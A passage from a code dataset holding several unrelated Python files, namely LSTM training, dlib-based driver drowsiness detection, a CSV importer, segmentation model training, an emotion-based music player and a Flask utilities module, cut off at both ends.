self.hidden_dim).type(dtype))\n def forward(self, input):\n # forward pass through LSTM layer\n lstm_out, self.hidden = self.lstm(input) # [1, batch_size, 24]\n # only take the output from the final time step\n y_pred = self.linear(lstm_out[:, -1])\n return y_pred.view(-1)\n\nmodel = LSTM(input_size, hidden_size, batch_size=1, output_dim=output_dim, num_layers=num_layers)\nmodel.seq_len = seq_len\nif torch.cuda.is_available() == True:\n model.cuda() # for cuda\n\nloss_fn = torch.nn.L1Loss()\noptimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n\n\n\"\"\"\n3. 
Train the Model\n\"\"\"\n\nhist = np.zeros(num_epochs) # loss history\nfor t in range(num_epochs): # for each epoch\n# for t in range(1): # [TEST]\n y_pred = np.empty(0)\n for i in range(num_batches): # for each batch\n print(\"Training the model: %d/%dth epoch, %d/%dth batch...\"\n % (t + 1, num_epochs, i + 1, num_batches), end='\\r')\n # last batch\n if i == num_batches-1:\n x_batch_arr = x_train[i*batch_size:]\n y_batch_arr = y_train[i*batch_size:]\n # other batches\n else:\n x_batch_arr = x_train[i*batch_size:i*batch_size+batch_size]\n y_batch_arr = y_train[i*batch_size:i*batch_size+batch_size]\n # transformation (ndarray -> torch)\n x_batch = Variable(torch.from_numpy(x_batch_arr).float()).type(dtype)\n y_batch = Variable(torch.from_numpy(y_batch_arr).float()).type(dtype)\n model.batch_size = x_batch.shape[0]\n model.hidden = model.init_hidden()\n # get predictions for the batch\n pred_i = model(x_batch)\n # forward pass\n loss_train = loss_fn(pred_i, y_batch)\n # zero out gradient, else they will accumulate between epochs\n optimizer.zero_grad()\n # backward pass\n loss_train.backward()\n # update parameters\n optimizer.step()\n # store the predictions\n y_pred = np.append(y_pred, pred_i.detach().cpu().numpy(), axis=0)\n if t == 0:\n loss_prev = float('inf')\n else:\n loss_prev = hist[t-1]\n # measure a loss in the current epohch\n loss_train = loss_fn(torch.from_numpy(y_pred), torch.from_numpy(y_train)).item()\n print(\"[INFO] Epoch \", t, \", Loss: \", loss_train, \", Difference: \", (loss_train - loss_prev))\n hist[t] = loss_train\n\n\n# # deprecated (the divide by zero problem)\n# def mean_absolute_percentage_error(y_obs, y_hat):\n# y_obs, y_hat = np.array(y_obs), np.array(y_hat)\n# return np.mean(np.abs((y_obs - y_hat) / y_obs)) * 100\n#\n#\n# loss_mape = mean_absolute_percentage_error(y_train, y_pred)\n\ndef weighted_mean_absolute_percentage_error(y_obs, y_hat):\n y_obs, y_hat = np.array(y_obs), np.array(y_hat)\n return np.abs(y_obs - y_hat).sum() / y_obs.sum()\n\nwmape = weighted_mean_absolute_percentage_error(y_train, y_pred)\n\n\n\"\"\"\n4. 
Visualization\n\"\"\"\n\n# default visualization setup\nplt.figure(dpi=100) # set the resolution of plot\n# set the default parameters of visualization\ncolor_main = '#2c4b9d'\ncolor_sub = '#00a650'\ncolor_ssub = '#ef9c00'\ncolor_sssub = '#e6551e'\nfont_family = 'Calibri'\nplt.rcParams.update({'font.family': font_family, 'font.size': 23, 'lines.linewidth': 1,\n                     \"patch.force_edgecolor\": True, 'legend.fontsize': 18})\n\n# calculate residual errors\nerr_func = lambda x, y: abs(x - y)\nerrors = err_func(y_train, y_pred)\n\n# line plot\n# plt.plot(errors, label=\"Residual Errors\", kind='bar')\nplt.plot(y_train, label=\"Actual Data\")\nplt.plot(y_pred, label=\"Predictions\")\nplt.legend(loc='best')\nplt.show()\n\n# visualize scatter plot\nfig, ax = plt.subplots()\nax.scatter(y_train, y_pred, 10) # 10: marker size\nax.plot([y_train.min(), y_train.max()], [y_train.min(), y_train.max()], 'k--', lw=2)\nax.set_xlabel('Actual Data')\nax.set_ylabel('Predictions')\nplt.show()\n\n# visualize scatter plot of filtered data\nfiltered_data_index = df.loc[df['seq_of_event'] <= 1].index\n# filtered_data_index = df.loc[(df['seq_of_event'] > 1) & (df['seq_of_event'] < 10)].index\n# filtered_data_index = df.loc[df['seq_of_event'] > 15].index\ny_train_filtered = list()\npred_filtered = list()\n# positional selection: y_train[k] belongs to df row k+seq_len-1, so this filter is only approximate\nfor i in range(filtered_data_index.size):\n    y_train_filtered.append(y_train[i])\n    pred_filtered.append(y_pred[i])\n\ny_train_filtered = np.asarray(y_train_filtered)\npred_filtered = np.asarray(pred_filtered)\n\nfig, ax = plt.subplots()\nax.scatter(y_train_filtered, pred_filtered, 10) # 10: marker size\nax.plot([y_train_filtered.min(), y_train_filtered.max()], [y_train_filtered.min(), y_train_filtered.max()], 'k--', lw=2)\nax.set_xlabel('Actual Data')\nax.set_ylabel('Predictions')\nplt.show()\n\n# visualize training loss\nplt.plot(hist, label=\"Training loss\")\nplt.legend(loc='best')\nplt.show()\n\n","sub_path":"venv/crt_prediction_lstm_16.py","file_name":"crt_prediction_lstm_16.py","file_ext":"py","file_size_in_byte":8645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"284630876","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport cv2\nimport dlib\nimport numpy\n\nfrom scipy.spatial import distance as dist\nfrom imutils import face_utils\n\n# define two constants, one for the eye aspect ratio to indicate\n# blink and then a second constant for the number of consecutive\n# frames the eye must be below the threshold\nEYE_AR_THRESH = 0.27\nEYE_AR_CONSEC_FRAMES = 2\nMOUTH_YA_CONSEC_FRAMES=9\nMOUTH_YAWNING_THRESH=0.7\n\nDAT_FILENAME = 'shape_predictor_68_face_landmarks.dat'\n\n# grab the indexes of the facial landmarks for the left and\n# right eye, respectively\n(lStart, lEnd) = face_utils.FACIAL_LANDMARKS_IDXS[\"left_eye\"]\n(rStart, rEnd) = face_utils.FACIAL_LANDMARKS_IDXS[\"right_eye\"]\n(mStart,mEnd) = face_utils.FACIAL_LANDMARKS_IDXS[\"mouth\"]\n\ndef eye_aspect_ratio(eye):\n    # compute the euclidean distances between the two sets of\n    # vertical eye landmarks (x, y)-coordinates\n    A = dist.euclidean(eye[1], eye[5])\n    B = dist.euclidean(eye[2], eye[4])\n\n    # compute the euclidean distance between the horizontal\n    # eye landmark (x, y)-coordinates\n    C = dist.euclidean(eye[0], eye[3])\n\n    # compute the eye aspect ratio\n    ear = (A + B) / (2.0 * C)\n\n    # return the eye aspect ratio\n    return ear\n\ndef detect_yanwing(mouth):\n    A=dist.euclidean(mouth[2],mouth[10])\n    B=dist.euclidean(mouth[3],mouth[9])\n    C=dist.euclidean(mouth[4],mouth[8])\n
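    # A, B and C span the mouth vertically; D, E and F below span it horizontally, so the ratio grows as the mouth opens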
D=dist.euclidean(mouth[0],mouth[6])\n E=dist.euclidean(mouth[1],mouth[5])\n F=dist.euclidean(mouth[11],mouth[7])\n yanwing_ratio=(A+B+C)/(D+E+F)\n return yanwing_ratio \n\ndef showPose(im, image_points): \n # 3D model points.\n model_points = numpy.array([\n (0.0, 0.0, 0.0), # Nose tip\n (0.0, -330.0, -65.0), # Chin\n (-225.0, 170.0, -135.0), # Left eye left corner\n (225.0, 170.0, -135.0), # Right eye right corne\n (-150.0, -150.0, -125.0), # Left Mouth corner\n (150.0, -150.0, -125.0) # Right mouth corner\n \n ])\n # Camera internals\n size=im.shape\n focal_length = size[1]\n center = (size[1]/2, size[0]/2)\n camera_matrix = numpy.array(\n [[focal_length, 0, center[0]],\n [0, focal_length, center[1]],\n [0, 0, 1]], dtype = \"double\"\n )\n \n #print (\"Camera Matrix :\",camera_matrix)\n dist_coeffs = numpy.zeros((4,1)) # Assuming no lens distortion\n (success, rotation_vector, translation_vector) = cv2.solvePnP(model_points, image_points, camera_matrix, dist_coeffs, flags=cv2.SOLVEPNP_ITERATIVE) \n\n # Project a 3D point (0, 0, 1000.0) onto the image plane.\n # We use this to draw a line sticking out of the nose\n (nose_end_point2D, jacobian) = cv2.projectPoints(numpy.array([(0.0, 250, 800.0)]), rotation_vector, translation_vector, camera_matrix, dist_coeffs)\n for p in image_points:\n cv2.circle(im, (int(p[0]), int(p[1])), 3, (0,0,255), -1)\n p1 = ( int(image_points[0][0]), int(image_points[0][1]))\n p2 = ( int(nose_end_point2D[0][0][0]), int(nose_end_point2D[0][0][1]))\n distance=dist.euclidean(p1,p2) \n cv2.line(im, p1, p2, (255,0,0), 2)\n\n return im ,distance\n\ndef process_frame(detector,predictor,gray_frame):\n eyes_open = True\n looking_forward = True\n distance=0\n frame = []\n # detect faces in the grayscale frame\n \n rects = detector(gray_frame, 0)\n #print(rects)\n # We now need to loop over each of the faces in the frame and \n # then apply facial landmark detection to each of them\n if len(rects) > 0:\n for rect in rects:\n # determine the facial landmarks for the face region, then\n # convert the facial landmark (x, y)-coordinates to a NumPy\n # array\n \n shape = predictor(gray_frame, rect)\n \n shape = face_utils.shape_to_np(shape)\n\n image_points=numpy.array([\n shape[30], # Nose tip\n shape[8], # Chin\n shape[45], # Left eye left corner\n shape[36], # Right eye right corne\n shape[54], # Left Mouth corner\n shape[48] # Right mouth corner\n ], dtype='double')\n\n frame, distance=showPose(gray_frame, image_points)\n \n # extract the left and right eye coordinates, then use the\n # coordinates to compute the eye aspect ratio for both eyes\n leftEye = shape[lStart:lEnd]\n rightEye = shape[rStart:rEnd]\n mouth=shape[mStart:mEnd]\n leftEAR = eye_aspect_ratio(leftEye)\n rightEAR = eye_aspect_ratio(rightEye)\n yawningRatio=detect_yanwing(mouth)\n \n # average the eye aspect ratio together for both eyes\n ear = (leftEAR + rightEAR) / 2.0\n\n # compute the convex hull for the left and right eye, then\n # visualize each of the eyes\n leftEyeHull = cv2.convexHull(leftEye)\n rightEyeHull = cv2.convexHull(rightEye)\n mouthHull=cv2.convexHull(mouth)\n cv2.drawContours(frame, [leftEyeHull], -1, (0, 255, 0), 1)\n cv2.drawContours(frame, [rightEyeHull], -1, (0, 255, 0), 1)\n cv2.drawContours(frame,[mouthHull],-1,(0,255,0),1)\n\n # check to see if the eye aspect ratio is below the blink\n # threshold, and if so, increment the blink frame ounter\n # @TODO\n # if yawningRatio>MOUTH_YAWNING_THRESH:\n # mouthCounter+=1\n # else:\n # mouthCounter=0\n # if 
mouthCounter>=MOUTH_YA_CONSEC_FRAMES:\n # totalYawn+=1\n # mouthCounter=0\n\n # if lower, eyes are closed\n if ear < EYE_AR_THRESH:\n eyes_open = False\n \n # # otherwise, the eye aspect ratio is not below the blink\n # # threshold\n # else:\n # # if the eyes were closed for a sufficient number of\n # # then increment the total number of blinks\n # if COUNTER >= EYE_AR_CONSEC_FRAMES:\n # TOTAL += 1\n\n # # reset the eye frame counter\n # COUNTER = 0\n # draw the total number of blinks on the frame along with\n # the computed eye aspect ratio for the frame\n\n # if no rects, then looking away\n print(distance)\n if len(rects) > 0:\n if distance < 200:\n looking_forward = True\n else:\n looking_forward = False\n else:\n looking_forward = False\n \n if len(frame) > 0:\n cv2.putText(frame, \"eyes open: {}\".format(eyes_open), (10, 30),\n cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\n cv2.putText(frame, \"EAR: {:.2f}\".format(ear), (300, 30),\n cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\n cv2.putText(frame,\"yawning:{}\".format(3),(10,60),\n cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\n cv2.putText(frame, \"looking ahead?: {}\".format(looking_forward), (300, 60),\n cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\n #show the frame\n cv2.imshow(\"Frame\", frame)\n key = cv2.waitKey(1) & 0xFF\n\n return (eyes_open, looking_forward)\nvc = cv2.VideoCapture(0)\nvc.set(3,640)\nvc.set(4,480)\ndetector = dlib.get_frontal_face_detector()\npredictor = dlib.shape_predictor(DAT_FILENAME)\nwhile True:\n ret, frame = vc.read()\n eyes_open,looking_forward=process_frame(detector,predictor,frame)\n","sub_path":"safe_driving/src/face_reader.py","file_name":"face_reader.py","file_ext":"py","file_size_in_byte":6901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"372471631","text":"import csv\n\n\n\ndef go_files():\n\treader = csv.reader(open('Fonti/file.csv', 'r', newline='', encoding='latin-1'), delimiter=';')\n\tnext(reader)\n\tfor line in reader:\n\t\tyield {\n\t\t\t'operazione': line[2],\n\t\t\t'atto': line[3],\n\t\t\t'anno': line[4],\n\t\t\t'data_atto': line[5],\n\t\t\t'rgnr': line[6],\n\t\t\t'rg_gip': line[7],\n\t\t\t'sentenza': line[8],\n\t\t\t'tribunale': line[9],\n\t\t\t'sezione': line[10],\n\t\t\t'pm': line[11],\n\t\t\t'imputati': line[12],\n\t\t\t'oc': line[13],\n\t\t\t'cosca': line[14],\n\t\t\t'zona': line[15],\n\t\t\t'reati': line[16],\n\t\t\t'pagg': line[17],\n\t\t\t'nome': line[18],\n\t\t}","sub_path":"importafonti.py","file_name":"importafonti.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"575496761","text":"import numpy as np\nimport pandas as pd\nimport random\nimport os\nimport datetime\nfrom collections import OrderedDict\nfrom typing import List\nfrom apex import amp\n\nimport time\nimport copy\nimport torch\nfrom torchvision import models\nimport segmentation_models_pytorch as smp\n\nfrom data_loader import *\nfrom augmentation import *\nfrom imblearn.over_sampling import SMOTE\n\n\nBASE_DIR = '../../../input'\nSEED = 2019\nNUM_FOLD = 0\nBATCH_SIZE = 32\nLR = 4e-4\nEPOCHS = 100\nEARLY_STOP_PATIENCE = 15\nREDUCE_LR_FACTOR = 0.25\nREDUCE_LR_PATIENCE = 7\nREDUCE_LR_MIN = 1e-6\nOPT_LEVEL = 'O1'\nPATH_WEIGTS = './weights_and_logs/model_wa_fold_%d.pt'%NUM_FOLD\nPATH_CHECKPOINTS = [f'./weights_and_logs/model_wa_{x}_fold_{NUM_FOLD}.pt' for x in range(5)]\nPATH_WEIGTS_PRETRAIN = './weights_and_logs/model_fold_%d.pt'%NUM_FOLD\n\n\ndef 
seed_everything(seed=1234):\n random.seed(seed)\n os.environ['PYTHONHASHSEED'] = str(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n torch.backends.cudnn.deterministic = True\n \n \ndef get_metrics(true, pred):\n _pred = np.empty(shape=(4,256,1600))\n for i in range(5):\n _pred[:,:,i*320:i*320+320] = pred[i]\n \n dice_pos, dice_neg = [], []\n for i in range(_pred.shape[0]):\n p = _pred[i,:,:].reshape(-1,)\n t = true[i,:,:].reshape(-1,)\n\n if t.max() == 1:\n dice_pos.append((2 * (p * t).sum()) / (p.sum() + t.sum()))\n dice_neg.append(np.nan)\n else:\n dice_pos.append(np.nan)\n dice_neg.append(0 if p.max() == 1 else 1)\n\n return dice_pos, dice_neg\n\ndef evaluate_model(model, dataloaders, device):\n model.eval()\n\n dice_pos, dice_neg = [], []\n for inputs, labels in dataloaders['val']:\n inputs = inputs[0].to(device)\n labels = labels[0].to(device)\n\n with torch.no_grad():\n outputs = model(inputs)\n outputs = torch.sigmoid(outputs)\n preds = (outputs > 0.5).long()\n \n _dice_pos, _dice_neg = get_metrics(labels.data.cpu().numpy(), \n preds.data.cpu().numpy())\n dice_pos.append(_dice_pos)\n dice_neg.append(_dice_neg)\n \n metrics_val = 0.5 * np.nanmean(dice_pos) + 0.5 * np.nanmean(dice_neg)\n \n return metrics_val, dice_pos, dice_neg\n\n\ndef train_model(model, criterion, optimizer, dataloaders, dataset_sizes, \n scheduler, device, num_epochs=25, early_stop_patience=15):\n since = time.time()\n\n best_model_wts = copy.deepcopy(model.state_dict())\n best_metrics = 0.0\n early_stoping = 0\n wa_index = 0\n\n for epoch in range(num_epochs):\n print('Epoch {}/{}'.format(epoch, num_epochs - 1))\n print('-' * 10)\n\n model.train()\n running_loss = 0.0\n\n # Train part\n for inputs, labels in dataloaders['train']:\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n optimizer.zero_grad()\n with torch.set_grad_enabled(True):\n outputs = model(inputs)\n loss = criterion(outputs, labels)\n \n with amp.scale_loss(loss, optimizer) as scaled_loss:\n scaled_loss.backward()\n\n optimizer.step()\n\n running_loss += loss.item() * inputs.size(0)\n\n epoch_loss_train = running_loss / dataset_sizes['train']\n \n # Valid part\n optimizer.zero_grad()\n metrics_val, dice_pos, dice_neg = evaluate_model(model, dataloaders, device)\n \n print('train loss: {:.4f}'.format(epoch_loss_train))\n print('val_dice:', np.round(metrics_val, 3), \n 'val_dice_pos:', np.round(np.nanmean(dice_pos, axis=0), 3), \n 'val_dice_neg:', np.round(np.nanmean(dice_neg, axis=0), 3))\n \n if metrics_val > best_metrics:\n print('*')\n best_metrics = metrics_val\n best_model_wts = copy.deepcopy(model.state_dict())\n torch.save(best_model_wts, PATH_CHECKPOINTS[wa_index])\n early_stoping = 0\n wa_index = wa_index + 1 if wa_index < 4 else 0\n else:\n print()\n early_stoping += 1\n \n if early_stoping > early_stop_patience:\n break\n \n scheduler.step(metrics_val)\n print()\n \n with open('./weights_and_logs/logs.txt','a') as f:\n f.write('''train_loss: {:.4f} val_metrics: {:.4f}\\n'''.format(epoch_loss_train, \n metrics_val))\n\n time_elapsed = time.time() - since\n print('Training complete in {:.0f}m {:.0f}s'.format(\n time_elapsed // 60, time_elapsed % 60))\n print('Best val metrics: {:4f}'.format(best_metrics))\n\n order_indexes = []\n for _ in range(5):\n wa_index = wa_index - 1 if wa_index > 0 else 4\n order_indexes.append(wa_index)\n\n return model, order_indexes\n\n\ndef average_weights(state_dicts: List[dict]):\n everage_dict = OrderedDict()\n for k in state_dicts[0].keys():\n 
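        # element-wise mean of this parameter tensor across all checkpoints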
everage_dict[k] = sum([state_dict[k] for state_dict in state_dicts]) / len(state_dicts)\n return everage_dict\n\n\ndef find_best_weights(model, dataloaders, device, checkpoints):\n all_weights = [torch.load(path) for path in checkpoints]\n best_score = 0\n best_weights = []\n\n for w in all_weights:\n current_weights = best_weights + [w]\n average_dict = average_weights(current_weights)\n model.load_state_dict(average_dict)\n score, _, _ = evaluate_model(model, dataloaders, device)\n print(score, best_score)\n if score > best_score:\n best_score = score\n best_weights.append(w)\n\n return best_weights\n\n\ndef main():\n seed_everything(SEED)\n os.environ['CUDA_VISIBLE_DEVICES'] = '0'\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\n train_df = pd.read_csv(os.path.join('../../../input', 'train.csv'))\n train_df['ImageId'] = train_df['ImageId_ClassId'].apply(lambda x: x.split('_')[0])\n\n folds_ids = pd.read_csv('train-5-folds.csv')\n train_files = folds_ids.loc[folds_ids.fold != NUM_FOLD, 'ImageId_ClassId'].values\n valid_files = folds_ids.loc[folds_ids.fold == NUM_FOLD, 'ImageId_ClassId'].values\n\n # Dataset for train images\n train_dataset = Dataset_train(\n ids=train_files, \n df=train_df,\n augmentation=get_training_augmentation_crop_image(),\n preprocessing=get_preprocessing()\n )\n\n # Dataset for validation images\n valid_dataset = Dataset_valid(\n ids=valid_files, \n df=train_df,\n preprocessing=get_preprocessing()\n )\n\n dataloaders = {'train': torch.utils.data.DataLoader(train_dataset, shuffle=True, \n num_workers=0, batch_size=BATCH_SIZE),\n 'val': torch.utils.data.DataLoader(valid_dataset, shuffle=False, \n num_workers=0, batch_size=1)\n }\n\n dataset_sizes = {'train': len(train_dataset), 'val': len(valid_dataset)*5}\n\n model = smp.Unet('efficientnet-b3', classes=4, activation=None, encoder_weights='imagenet')\n #print(model)\n model = model.to(device)\n\n criterion = torch.nn.BCEWithLogitsLoss()\n optimizer_ft = torch.optim.Adam(model.parameters(), lr=LR)\n\n model, optimizer_ft = amp.initialize(model, optimizer_ft, \n opt_level=OPT_LEVEL)\n\n lr_scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer_ft, mode='max', \n factor=REDUCE_LR_FACTOR,\n patience=REDUCE_LR_PATIENCE, \n min_lr=REDUCE_LR_MIN,\n verbose=True)\n \n #model.load_state_dict(torch.load(PATH_WEIGTS_PRETRAIN))\n model, order_indexes = train_model(model, criterion, optimizer_ft, dataloaders,\n dataset_sizes, lr_scheduler, device,\n num_epochs=EPOCHS, early_stop_patience=EARLY_STOP_PATIENCE)\n\n checkpoints = np.array(PATH_CHECKPOINTS)[order_indexes]\n\n best_weights = find_best_weights(model, dataloaders, device, checkpoints)\n best_weight = average_weights(best_weights)\n torch.save(best_weight, PATH_WEIGTS)\n \n\nif __name__=='__main__':\n main()\n","sub_path":"pytorch/segmentation/train_effnet_fp16_WA.py","file_name":"train_effnet_fp16_WA.py","file_ext":"py","file_size_in_byte":8597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"454161433","text":"#!/usr/bin/env python3\n\n\"\"\"A python script that will play a playlist based on facial expression.\"\"\"\n\n# Import packages.\nimport numpy as np\nimport cv2\nimport dlib\nimport math\nimport os.path\n\n# My classes.\nfrom constants import PRED, HAAR, HAAR2, HAAR3, HAAR4\nfrom emotion_recognition import SVM\nfrom face_aligner import FaceAligner\n\n\nprint(__doc__)\n\n# Set Face Detectors.\nfaceDet = cv2.CascadeClassifier(HAAR)\nfaceDet2 = 
cv2.CascadeClassifier(HAAR2)\nfaceDet3 = cv2.CascadeClassifier(HAAR3)\nfaceDet4 = cv2.CascadeClassifier(HAAR4)\nfaceDet5 = dlib.get_frontal_face_detector() # dlib's face detector\n\n# Build the required objects.\nclahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))\npredictor = dlib.shape_predictor(PRED) # file must be in dir\nfa = FaceAligner(predictor, desiredFaceWidth=380)\ndata = {}\nfont = cv2.FONT_HERSHEY_SIMPLEX\n\n\ndef get_face_recs(image):\n \"\"\"Get dlib rectangle around the face.\"\"\"\n detections = faceDet5(image, 1)\n\n haar_detections = []\n if not len(detections) > 0: # dlib's detector will work over 50% of the time\n haar_detections = faceDet.detectMultiScale(image, scaleFactor=1.1,\n minNeighbors=10, minSize=(5, 5),\n flags=cv2.CASCADE_SCALE_IMAGE)\n haar_detections2 = faceDet2.detectMultiScale(image, scaleFactor=1.1,\n minNeighbors=10, minSize=(5, 5),\n flags=cv2.CASCADE_SCALE_IMAGE)\n haar_detections3 = faceDet3.detectMultiScale(image, scaleFactor=1.1,\n minNeighbors=10, minSize=(5, 5),\n flags=cv2.CASCADE_SCALE_IMAGE)\n haar_detections4 = faceDet4.detectMultiScale(image, scaleFactor=1.1,\n minNeighbors=10, minSize=(5, 5),\n flags=cv2.CASCADE_SCALE_IMAGE)\n\n if len(haar_detections) > 0:\n for (x, y, w, h) in haar_detections:\n dlib_rect = dlib.rectangle(int(x), int(y), int(x + w), int(y + h))\n detections.append(dlib_rect)\n break # if found, no point in making another feature vector\n elif len(haar_detections2) > 0:\n for (x, y, w, h) in haar_detections2:\n dlib_rect = dlib.rectangle(int(x), int(y), int(x + w), int(y + h))\n detections.append(dlib_rect)\n break\n elif len(haar_detections3) > 0:\n for (x, y, w, h) in haar_detections3:\n dlib_rect = dlib.rectangle(int(x), int(y), int(x + w), int(y + h))\n detections.append(dlib_rect)\n break\n elif len(haar_detections4) > 0:\n for (x, y, w, h) in haar_detections4:\n dlib_rect = dlib.rectangle(int(x), int(y), int(x + w), int(y + h))\n detections.append(dlib_rect)\n break\n\n return detections\n\n\ndef get_landmarks(image):\n \"\"\"As in svms.py, used to create feature vectors to train on.\"\"\"\n detections = get_face_recs(image)\n\n # We may detect 0, 1 or many faces. 
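    # Hedged sketch of the per-landmark feature encoding built in the loop
    # here: raw (x, y), Euclidean distance to the landmark centroid, and the
    # angle to the centroid in degrees. Toy points only; uncomment to run:
    #
    #   import math
    #   import numpy as np
    #   pts = [(0.0, 0.0), (2.0, 0.0), (0.0, 2.0)]
    #   cx, cy = np.mean([p[0] for p in pts]), np.mean([p[1] for p in pts])
    #   feats = []
    #   for x, y in pts:
    #       feats.append(x)
    #       feats.append(y)
    #       feats.append(np.linalg.norm(np.asarray((y - cy, x - cx))))
    #       feats.append((math.atan2(y - cy, x - cx) * 360) / (math.pi * 2))
    #   assert len(feats) == 4 * len(pts)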
Loop through each face detected.\n for i, j in enumerate(detections):\n # Draw facial landmarks with the predictor class.\n shape = predictor(image, j)\n xlist = []\n ylist = []\n\n # Store X and Y coordinates in separate lists.\n for i in range(1, 68): # 68 because we're looking for 68 landmarks\n xlist.append(float(shape.part(i).x))\n ylist.append(float(shape.part(i).y))\n\n # Find both coordinates for the centre of gravity (middle point).\n xmean = np.mean(xlist)\n ymean = np.mean(ylist)\n\n # Calculate the distance from centre to other points in both axes.\n xcentral = [(x-xmean) for x in xlist]\n ycentral = [(y-ymean) for y in ylist]\n\n # Condition the vectors.\n landmarks_vectorised = []\n for x, y, w, z in zip(xcentral, ycentral, xlist, ylist):\n landmarks_vectorised.append(w)\n landmarks_vectorised.append(z)\n meannp = np.asarray((ymean, xmean))\n coornp = np.asarray((z, w))\n dist = np.linalg.norm(coornp-meannp)\n landmarks_vectorised.append(dist)\n landmarks_vectorised.append((math.atan2(y, x)*360)/(math.pi*2))\n if len(detections) < 1:\n return \"error\"\n return landmarks_vectorised\n\n\n# Build and train the classifier we're using.\nSVM = SVM()\nif (os.path.isfile('svm.pkl')):\n SVM.load()\nelse:\n SVM.train()\n SVM.save()\n\n# Open video capture.\ncap = cv2.VideoCapture(0)\nif cap.isOpened() is False:\n print(\"[Err] Capture failed to open.\")\n\ncv2.namedWindow(\"test\")\nwhile (cap.isOpened()):\n # Capture frame-by-frame.\n ret, frame = cap.read()\n\n # Display the resulting frame\n cv2.imshow(\"test\", frame)\n\n if not ret:\n break\n k = cv2.waitKey(1)\n\n if k % 256 == 27:\n # ESC pressed\n print(\"Quit\")\n break\n elif k % 256 == 32:\n # SPACE pressed\n lm = \"error\"\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n face_rect = []\n detections = get_face_recs(frame)\n for detection in detections:\n clahe_image = clahe.apply(gray)\n aligned = fa.align(clahe_image, detection)\n lm = get_landmarks(aligned)\n face_rect = detection\n break\n\n if lm is not \"error\":\n sample = np.array([lm])\n sample.reshape(1, -1)\n emotion = SVM.predict(sample)\n print(\"Emotion detected: {}\".format(emotion.capitalize()))\n cv2.putText(frame, emotion.capitalize(),\n (50, 50), cv2.FONT_HERSHEY_PLAIN, 3, (255, 0, 0), 2)\n cv2.imshow(\"Frame\", frame)\n # TODO : MUSIC PLAYER\n\n\n# When everything done, release the capture\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"music_player.py","file_name":"music_player.py","file_ext":"py","file_size_in_byte":6044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"536829442","text":"'''\nCreated on 01/03/2014\n\n@author: alfred\n'''\nimport logging\nimport hashlib\nfrom flask import request as flask_request\nfrom flask.globals import current_app\nfrom dirty_models.model_types import ListModel\nfrom xml.etree.ElementTree import QName, ElementTree\nfrom functools import wraps\nfrom contextlib import contextmanager\nfrom mc_be.commons.exceptions import NotSupported\n\n\nlogger = logging.getLogger('utils')\n\n\nclass ProxyRequest:\n\n \"\"\"\n Create a proxy to flask request to set and get custom mc-pybe application\n \"\"\"\n\n def __getattr__(self, item):\n try:\n value = flask_request.custom_configuration[item]\n except (AttributeError, TypeError):\n flask_request.custom_configuration = {}\n value = getattr(flask_request, item)\n except KeyError:\n value = getattr(flask_request, item)\n return value\n\n def __setattr__(self, key, value):\n try:\n 
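        # Hedged usage sketch for this request proxy (assumes an active Flask
        # request context; `user_id` is a hypothetical attribute). Writes go
        # into flask_request.custom_configuration; reads fall back to the
        # real request object when the key is absent:
        #
        #   from mc_be.commons.utils import request
        #   request.user_id = 42      # stored in custom_configuration
        #   request.user_id           # -> 42
        #   request.method            # falls through to flask, e.g. 'GET'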
flask_request.custom_configuration[key] = value\n except (AttributeError, TypeError):\n flask_request.custom_configuration = {}\n flask_request.custom_configuration[key] = value\n\n def __delattr__(self, item):\n try:\n del flask_request.custom_configuration[item]\n except (AttributeError, TypeError):\n flask_request.custom_configuration = {}\n delattr(flask_request, item)\n except KeyError:\n delattr(flask_request, item)\n\n def get_custom_info(self):\n try:\n return flask_request.custom_configuration\n except (AttributeError, TypeError):\n flask_request.custom_configuration = {}\n\n def set_custom_info(self, info_dict):\n try:\n flask_request.custom_configuration.update(info_dict)\n except (AttributeError, TypeError):\n flask_request.custom_configuration = info_dict.copy()\n\n\n# Proxy for request to be used for custom configuration\nrequest = ProxyRequest()\n\n\nclass ProxyContext:\n\n '''\n Use it to create singletons on app context\n '''\n\n def __init__(self, name, namespace=\"ProxyContext\"):\n '''\n Constructor\n '''\n self._name = name\n self._namespace = namespace\n\n def _init_namespace(self):\n app = current_app\n if not hasattr(app, 'extensions'):\n app.extensions = {}\n\n if self._namespace not in app.extensions:\n app.extensions[self._namespace] = {}\n\n return app.extensions[self._namespace]\n\n def _get_object(self):\n return self._init_namespace()[self._name]\n\n def _install_object(self, obj):\n self._init_namespace()[self._name] = obj\n\n def __getattr__(self, name):\n return getattr(self._get_object(), name)\n\n def __setattr__(self, name, value):\n if name[0] == '_':\n return super(ProxyContext, self).__setattr__(name, value)\n setattr(self._get_object(), name, value)\n\n def __delattr__(self, name):\n delattr(self._get_object(), name)\n\n def __nonzero__(self):\n return bool(self._get_object())\n\n def __str__(self):\n return str(self._get_object())\n\n def __repr__(self):\n return repr(self._get_object())\n\n\ndef get_attr_by_path(obj, field, default=None):\n try:\n field, next_field = field.split('.', 1)\n except ValueError:\n next_field = ''\n\n if field == '*':\n if isinstance(obj, (list, ListModel, set)):\n for item in obj:\n value = get_attr_by_path(item, next_field, None)\n if value is not None:\n return value\n return default\n if isinstance(obj, dict):\n for index in obj:\n value = get_attr_by_path(obj, \"%s.%s\" % (index, next_field), None)\n if value is not None:\n 